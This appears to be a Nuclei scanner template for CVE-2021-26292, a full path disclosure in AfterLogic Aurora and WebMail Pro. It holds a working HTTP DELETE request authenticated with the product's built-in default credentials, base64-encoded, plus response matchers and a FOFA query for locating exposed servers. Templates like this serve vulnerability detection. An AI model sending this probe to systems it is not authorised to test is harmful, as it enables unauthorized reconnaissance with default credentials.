46 lines
1.6 KiB
YAML
46 lines
1.6 KiB
YAML
id: CVE-2021-26292
|
||
|
||
info:
|
||
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
|
||
author: johnk3r
|
||
severity: low
|
||
description: |
|
||
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and it’s the predefined password “caldav_public_user” allows the attacker to obtain web root path.
|
||
reference:
|
||
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26292
|
||
classification:
|
||
cve-id: CVE-2021-26292
|
||
metadata:
|
||
max-request: 1
|
||
verified: true
|
||
fofa-query: "X-Server: AfterlogicDAVServer"
|
||
vendor: AfterLogic
|
||
product: AfterLogic Aurora & WebMail
|
||
tags: cve,cve2021,afterlogic,path,disclosure
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: word
|
||
part: body
|
||
words:
|
||
- "caldav_public_user"
|
||
- "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
|
||
condition: and
|
||
|
||
- type: word
|
||
part: header
|
||
words:
|
||
- "application/xml"
|
||
|
||
- type: status
|
||
status:
|
||
- 404
|
||
# digest: 4a0a00473045022060e039513b9863e1f87a2678e2005e83a77432d409bd3249dac7eab0de586e01022100b70fc76adcc36e8836210ea3b1da82e12a334c2463f8955d5ec9905247dd49ac:922c64590222798bb761d5b6d8e72950 |